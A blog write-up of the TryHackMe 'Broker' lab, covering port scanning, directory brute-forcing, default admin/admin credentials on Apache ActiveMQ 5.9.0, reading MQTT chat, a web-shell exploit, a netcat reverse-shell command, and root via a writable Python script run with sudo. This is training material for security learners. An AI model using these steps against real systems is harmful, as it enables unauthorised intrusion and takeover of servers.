Broker — TryHackMe

This is the write-up for TryHackMe’s room named Broker. Description says: Paul and Max found a way to chat at work by using a certain kind of software. They think they outsmarted their boss, but do not seem to know that eavesdropping is quite possible…They better be careful… Interesting.This room can be found here:

As always let’s scan the target with NMAP to what is running on the target.



# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p-

└─$ sudo nmap -sS -Pn -T4 -p-
22/tcp open ssh
1883/tcp open mqtt
8161/tcp open patrol-snmp
42449/tcp open unknown

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449

└─$ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
|_ 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
1883/tcp open mqtt?
8161/tcp open http Jetty 7.6.9.v20130131
|_http-server-header: Jetty(7.6.9.v20130131)
|_http-title: Apache ActiveMQ
42449/tcp open tcpwrapped

Do a TCP portscan on all ports with port number greater than 1000 and smaller than 10000! Which TCP ports do you find to be open? (counting up)

So from the above NMAP the required ports are: 1883,8161

What is the name of the software they use?

Again NMAP clearly shows the software used is ActiveMQ. Also port 8161 is running HTTP, so let’s check out this via the browser.

Yes it is indeed ActiveMQ. So lets brute force all the directories which might prove useful using ffuf.


└─$ ffuf -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
images [Status: 302, Size: 0, Words: 1, Lines: 1]
index.html [Status: 200, Size: 5968, Words: 2626, Lines: 134]
admin [Status: 401, Size: 1278, Words: 977, Lines: 33]
api [Status: 302, Size: 0, Words: 1, Lines: 1]
styles [Status: 302, Size: 0, Words: 1, Lines: 1]
[Status: 200, Size: 5968, Words: 2626, Lines: 134]
:: Progress: [882184/882184] :: Job [1/1] :: 987 req/sec :: Duration: [0:17:30] :: Errors: 0 ::

/admin looks interesting. Let’s access this page, but it asks for a username and password. Searching around found here that default credentials for Apache ActiveMQ Administration Console are just admin/admin. Tired them and it worked and also noticed a version number i.e. 5.9.0

Which videogame are Paul and Max talking about?

At this point it is clear that we need to talk to the daemon mqtt running on port 1883(check nmap scans). So searching for a mqtt client found this:

Also found this link very useful:

But we still need a "topic” for subscribe() to subscribe to a topic and receive messages. This was found here:

So edited the code from GitHub link and added the topic,IP Address of the Target and the MQTT version which needed to be 3.1:

Ran the code as python3

Voila! and we are able to see the chat between Paul and Max.Also found the Video game’s name in this chat. Great. Now we need to exploit some vulnerability in this version of ActiveMQ to move forward. Searchsploit revealed a vulnerability which was also applicable for 5.9.0.

Reading more info from this Metasploit module found a link to a CVE for the vulnerability:

For some reason the Metasploit module for exploration doesn't work so search around for any exploit available and found this one on GitHub:

It was pretty simple to run:

python3 -u

And this put a web shell at and used it like to get the Remote Code Execution.

Reverse Shell

Now to gain a reverse shell tried few payload and this one worked which gave us a reverse. Note start a netcat listener on the attacking machine before executing the reverse shell payload URL and also replace the IP address with your own IP address:

nc 9999 -e /bin/sh

Upgrade and Stabilize Shell
Run the following commands on the target to upgrade current shell:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
export TERM=xterm


The flag was in the same directory where we got our reverse shell:

Privilege Escalation

Running sudo -l indicated that we can run in the /opt/apache-activemq-5.9.0 directory. Also on this file the current user activemq has write permissions.

So we can easily get root by adding the following code in using nano as vi was not available on the target:

import os

and then running it with sudo:

We are root and found the root flag at /root/root.txt

This was an interesting room and the spying on the chat part was a winner for me. If you like the write-up please clap and follow me.




Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium



2 ways to auto-generate documentation for Laravel APIs 📄⚙️

Day 34/100 Another late day at work…

Preparation of CKAD and CKA certification

The Basics of Threat Modeling (Part I)

My journey to learn Python — Day 2

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

HTB —Beep Writeup

TRYHACKME — Vulnerability Capstone

Zero Logon — CyberDefense Walkthrough

Tryhackme — Game Zone Writeup